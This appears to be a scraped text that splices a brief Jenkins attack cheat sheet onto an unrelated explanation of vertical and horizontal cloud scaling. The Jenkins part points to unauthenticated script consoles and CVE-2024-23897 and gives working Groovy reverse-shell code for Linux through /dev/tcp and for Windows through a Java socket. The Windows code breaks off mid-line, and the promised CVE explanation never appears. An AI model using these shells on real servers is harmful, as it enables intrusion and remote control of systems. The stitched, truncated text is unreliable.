Exploiting Jenkins / CVE-2024-23897

Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script

If you don't have access to script console and the version is vulnerable to CVE-2024-23897, then exploit it to read files and get authentication credentials for Jenkins (explained below).

Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script.

For Linux,

    r = Runtime.getRuntime()
    p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
    p.waitFor()

For Windows,

    String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea...

Scaling Up/Vertical Scaling and Scaling Out/Horizontal Scaling

These terms are often used in the cloud to refer to flexible ways of increasing performance and computing power.

Scaling Up, or Vertical Scaling, means increasing the memory, storage or compute power of an existing virtual machine. For example, you can add additional memory to a database server to make it run faster.

Scaling Out, or Horizontal Scaling, means adding extra virtual machines to power your application. You may create many virtual machines configured together and use a load balancer to distribute work across them.